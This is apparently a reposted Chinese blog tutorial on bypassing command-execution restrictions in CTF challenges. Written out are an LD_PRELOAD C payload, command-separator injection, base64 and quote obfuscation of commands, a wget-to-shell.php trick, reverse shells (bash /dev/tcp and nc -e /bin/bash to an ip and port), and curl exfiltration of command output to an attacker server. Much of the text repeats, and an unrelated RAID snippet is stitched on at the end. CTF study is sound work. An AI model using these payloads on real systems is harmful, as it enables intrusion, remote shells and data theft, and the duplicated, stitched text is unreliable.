今天就跟大家聊聊有关CTF中的命令怎样执行绕过,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。在介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区别在于,远程代码执行实际上是调用服务器网站代码进行执行,而命令注入则是调用操作系统命令进行执行。作为CTF最基础的操作,命令执行的学习主要是为了以后进一步使用webshell打下基础同样的,今天还会介绍如何使用各种命令执行绕过的方式首先我们先来看代码执行动态调用:这个地方是ctf曾经的一个考点,也是我在强网杯出过的一道题目,叫”高明的黑客”,里面使用的就是混淆代码+动态函数调用,这种写法实际上在红蓝攻防中很经常用到,就是一堆函数进行混淆,然后在里面插入一个动态函数进行真正的代码执行或者是命令执行。当时那道题目的灵感是来自于一场安全响应,黑客攻陷网站后,在里头插入了混淆以后的代码,1000多个文件里面只有一条路径是正常执行的,最后是使用debug直接看栈内存的调用来判断哪个路径是真的动态调用。常见的命令执行函数常见命令执行函数
system()
passthru()
exec()
shell_exec()
`反引号反引号➜ ~ php -r “echo @whoami;”这个是大家很容易忘记的一个命令执行点,ctf赛题最近也出了很多道关于这个的题目。我们在第二篇中会拿一个例子来详细分析他的作用。命令执行绕过以上是我们常见的代码注入或者是命令注入的函数,但是很多时候在ctf中,出题人不会那么轻易的就让我们执行命令。因此我们必须要能够掌握多种命令执行绕过的姿势。一般来说,遇到的无非以下两种情况:disable_function
过滤字符
disable_function这个东西很明显就是什么呢,你能够代码执行了,但是发现不论是蚁剑还是你自己手打,都执行不了系统命令,然后你用phpinfo这种函数读取后发现如下配置:实际上是开发者在后端的php.ini里写了如下语句disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_file,dl,socket_listen,socket_create,socket_bind,socket_accept, socket_connect, stream_socket_server, stream_socket_accept,stream_socket_client,ftp_connect, ftp_login,ftp_pasv,ftp_get,sys_getloadavg,disk_total_space, disk_free_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname最常用的就是两种办法ld_preload
php_gc
ld_preload今年来比较少考到,但是在红蓝攻防中很经常应用需要对面满足条件是:对面没有禁用mail函数(可能这也是最近比赛不爱考这个的原因之一,如果禁用了mail,那等于就是考察别的点了,不禁用mail又一堆人用这个方法绕过,也很没有意思)操作方法:hack.c#include
#include
#include
void payload() {
system(“ls /var/www/html > /tmp/smity”);
}
int geteuid()
{
if (getenv(“LD_PRELOAD”) == NULL) { return 0; }
unsetenv(“LD_PRELOAD”);
payload();
}
gcc –share hack -o hack.so然后传入如下php文件访问php文件就可以运行刚才的命令了。然后可以在/tmp/smity文件下看到ls的结果。php_gc从这两次公益赛来看这个都是考点(春秋和高校)两次的题目分别是:easy-thinking和php-uaf都是做到了代码执行却没有命令执行,所以通常步骤就是,利用蚁剑链接我们的shell代码执行,将下面的脚本写好命令传上去然后访问,利用phpgc进程Bypass 条件:php7.0
这里的大家可以参考这个博客,里面有比较详细的脚本,因为太长了就不贴在这里了https://wulidecade.cn/2019/09/27/%E7%BB%95%E8%BF%87disable-function%E6%B1%87%E6%80%BB/过滤字符这个限制一般是题目中允许你使用system,但是很奇怪的是你却没有办法获取执行命令的结果比如,对面过滤了空格,你能执行ls,但是没法cat读取文件比如,对面过滤了flag这个词语,什么文件都可以读取,就是没办法读取flag等等,都是ctf题目做到最后,这个出题人小心思故意在这里卡你一下。这个时候你就需要试试我接下来讲的这些方法:空格代替空格在bash下,可以用以下字符代替空格
root@kali:~# cat
这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在linux下表示分隔符,只有cat$IFSa.txt的时候,bash解释器会把整个IFSa当做变量名,所以导致没有办法运行,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用,而$9指的是当前系统shell进程的第九个参数的持有者,就是一个空字符串,因此$9相当于没有加东西,等于做了一个前后隔离。
截断符号
ctf很喜欢考的一点是命令执行的连接,这个地方它通常会给一个已有的命令执行,比如代码写好了ping命令,叫你填写一个ip参数这样的题目,这个时候就需要测试截断符号,将你输入的ip参数和后面要执行的命令隔开。首先测试所有的截断符号:
‘$’‘;’‘|’‘-’‘(’‘)’‘反引号’‘||’‘&&’‘&’‘}’‘{’%0a可以当作空格来用;
利用截断符号配合普通命令简单问题基本就出来;例如:ip=127.0.0.1;cat /home/flag.txt这样就可以达到同时执行两条命令的效果
利用base编码绕过
这种绕过针对的是系统过滤敏感字符的时候,比如他过滤了cat命令,那么就可以用下面这种方式将cat先base64编码后再进行解码运行。
root@kali:~# echo ‘cat’ | base64
Y2F0Cg==
root@kali:~# `echo ‘Y2F0Cg==’ | base64 -d` test.txt
hello world!
连接符,用两个单引号可以绕过
cat /etc/pass’w’d这个是现在很喜欢考的点之一,基本能通杀大部分命令注入waf因为单引号一旦过滤很大程度上会影响正常解题。
反斜杠利用
这个是很经典的hitcon题目,hitcon连续好几年出了绕过长度限制执行命令的题目
比如七个字符执行命令
七个字的命令执行
这里先介绍一下小技巧,linux下创建文件的命令可以用1>1创建文件名为1的空文件
ls>1可以直接把把ls的内容导入一个文件中,但是会默认追加n
在linux里也是个连接符,最早使用在屏幕不能容纳超过18个字符的第一代计算机,用于连接上下两行,这里使用它来绕过限制
语句为wget 域名.com -O shell.php
ls > a 写入服务器文件然后sh a 读取
这里注意.不能作为文件名的开头,因为linux下.是隐藏文件的开头,ls列不出来
然而这里还有个问题,就是ls下的文件名是按照字母顺序排序的,所以需要基于时间排序 将最后的命令改成ls -t>a
至于绕过5个字符执行命令,绕过4个字符,那其实都是用做的trick,这里不一一赘述了。
命令执行结果返回长度受限制
这次在高校战役上有一道题目提醒了我这个,出题人其实能过滤的就那么多,那么还有一种方法卡住你就是不让你看到命令执行的完整结果,比如不回显或者是回显一行,这次题目需要用道soapclient做代码执行,但是它有一点不好就是没办法回显完整,只能看到一行结果,这样对我们的命令执行很不方便,而且dev文件没有权限使用,这个时候我们可以用下面这个反弹shell的办法。
其实反弹shell的命令大家很喜欢用这个:
bash -i >& /dev/tcp/ip/port 0>&1
但是这个有一点不好,他需要dev也需要bash,实际上用我下面这个命令会更简单:监听端口后
nc -e /bin/bash ip port
这样也可以拿到shell,其实本质是一样的,没有太大区别,只是简化了一下。
一道很经典的命令执行绕过
这个题目好像看到两次了,一开始大家都不会脑洞,后来发现这次还是好多人没有学会,也没有去总结poc:
首先先明白这个地方限制了什么
-
限制了只能代码执行
-
限制了只能执行一个变量$x
-
限制了这个变量的长度
所以这个地方一共有两个思路
-
传入数组,让他能够执行多个变量,因为$_GET是个数组,但是这个思路是错误的,因为GET虽然能传入多个变量,但是已经限制了只能执行$x,而$x来自GET数组里键值为x的变量,所以第这个我们放弃。
-
反引号执行自己,传入$x本身,也就是说,直接让$_GET[‘x’]=$x,这样一来 ,就会使得$x=$x,如果$x是命令,就会通过反引号自己来执行它
如果$x后面再跟上我们之前讲的连接符会是什么样呢
`$x`;abcd
那么即使取出前5个字符,还是会执行整个的$x,用上分隔符就会执行多条命令
假设我们在这里加点难度,没有回显,执行命令但是不给你结果,怎么办呢?
两种方法
-
反弹shell
-
curl
反弹shell,我们这里可以使用;来连接命令,
$x;nc -e /bin/bash ip port
然后在自己服务器端口 nc -lvv 8080进行监听
但是这题要是再难一点,没有权限执行反弹shell这个操作呢
我们还可以用另一种方法:
curl的妙用
在curl里面有这几种方式
直接ip发送get包
-d发送post包
-v 显示整个通信过程
–data发送数据
这里可以使用curl -v http://ip?whoami
或者 curl -v http://ip –data whoami
IP为自己服务器,就可以在/var/log/apache2/access.log下看到命令执行的结果了。
看完上述内容,你们对CTF中的命令怎样执行绕过有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注云编程开发博客行业资讯频道,感谢大家的支持。
这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在linux下表示分隔符,只有cat$IFSa.txt的时候,bash解释器会把整个IFSa当做变量名,所以导致没有办法运行,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用,而$9指的是当前系统shell进程的第九个参数的持有者,就是一个空字符串,因此$9相当于没有加东西,等于做了一个前后隔离。截断符号ctf很喜欢考的一点是命令执行的连接,这个地方它通常会给一个已有的命令执行,比如代码写好了ping命令,叫你填写一个ip参数这样的题目,这个时候就需要测试截断符号,将你输入的ip参数和后面要执行的命令隔开。首先测试所有的截断符号:‘$’‘;’‘|’‘-’‘(’‘)’‘反引号’‘||’‘&&’‘&’‘}’‘{’%0a可以当作空格来用;利用截断符号配合普通命令简单问题基本就出来;例如:ip=127.0.0.1;cat /home/flag.txt这样就可以达到同时执行两条命令的效果这种绕过针对的是系统过滤敏感字符的时候,比如他过滤了cat命令,那么就可以用下面这种方式将cat先base64编码后再进行解码运行。root@kali:~# echo ‘cat’ | base64
Y2F0Cg==
root@kali:~# `echo ‘Y2F0Cg==’ | base64 -d` test.txt
hello world!连接符,用两个单引号可以绕过cat /etc/pass’w’d这个是现在很喜欢考的点之一,基本能通杀大部分命令注入waf因为单引号一旦过滤很大程度上会影响正常解题。反斜杠利用这个是很经典的hitcon题目,hitcon连续好几年出了绕过长度限制执行命令的题目比如七个字符执行命令七个字的命令执行这里先介绍一下小技巧,linux下创建文件的命令可以用1>1创建文件名为1的空文件ls>1可以直接把把ls的内容导入一个文件中,但是会默认追加n 在linux里也是个连接符,最早使用在屏幕不能容纳超过18个字符的第一代计算机,用于连接上下两行,这里使用它来绕过限制语句为wget 域名.com -O shell.phpls > a 写入服务器文件然后sh a 读取这里注意.不能作为文件名的开头,因为linux下.是隐藏文件的开头,ls列不出来然而这里还有个问题,就是ls下的文件名是按照字母顺序排序的,所以需要基于时间排序 将最后的命令改成ls -t>a至于绕过5个字符执行命令,绕过4个字符,那其实都是用做的trick,这里不一一赘述了。命令执行结果返回长度受限制这次在高校战役上有一道题目提醒了我这个,出题人其实能过滤的就那么多,那么还有一种方法卡住你就是不让你看到命令执行的完整结果,比如不回显或者是回显一行,这次题目需要用道soapclient做代码执行,但是它有一点不好就是没办法回显完整,只能看到一行结果,这样对我们的命令执行很不方便,而且dev文件没有权限使用,这个时候我们可以用下面这个反弹shell的办法。其实反弹shell的命令大家很喜欢用这个:bash -i >& /dev/tcp/ip/port 0>&1但是这个有一点不好,他需要dev也需要bash,实际上用我下面这个命令会更简单:监听端口后nc -e /bin/bash ip port这样也可以拿到shell,其实本质是一样的,没有太大区别,只是简化了一下。一道很经典的命令执行绕过这个题目好像看到两次了,一开始大家都不会脑洞,后来发现这次还是好多人没有学会,也没有去总结poc:
首先先明白这个地方限制了什么限制了只能代码执行
限制了只能执行一个变量$x
限制了这个变量的长度
所以这个地方一共有两个思路传入数组,让他能够执行多个变量,因为$_GET是个数组,但是这个思路是错误的,因为GET虽然能传入多个变量,但是已经限制了只能执行$x,而$x来自GET数组里键值为x的变量,所以第这个我们放弃。
反引号执行自己,传入$x本身,也就是说,直接让$_GET[‘x’]=$x,这样一来 ,就会使得$x=$x,如果$x是命令,就会通过反引号自己来执行它
如果$x后面再跟上我们之前讲的连接符会是什么样呢
`$x`;abcd那么即使取出前5个字符,还是会执行整个的$x,用上分隔符就会执行多条命令假设我们在这里加点难度,没有回显,执行命令但是不给你结果,怎么办呢?两种方法反弹shell
curl
反弹shell,我们这里可以使用;来连接命令,$x;nc -e /bin/bash ip port然后在自己服务器端口 nc -lvv 8080进行监听但是这题要是再难一点,没有权限执行反弹shell这个操作呢我们还可以用另一种方法:curl的妙用在curl里面有这几种方式直接ip发送get包-d发送post包-v 显示整个通信过程–data发送数据这里可以使用curl -v http://ip?whoami或者 curl -v http://ip –data whoamiIP为自己服务器,就可以在/var/log/apache2/access.log下看到命令执行的结果了。看完上述内容,你们对CTF中的命令怎样执行绕过有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注云编程开发博客行业资讯频道,感谢大家的支持。
本文小编为大家详细介绍“linux raid指的是什么”,内容详细,步骤清晰,细节处理妥当,希望这篇“linux raid指的是什么”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。 在linux中,RAID是指“磁盘阵列”,有“独立磁…
免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。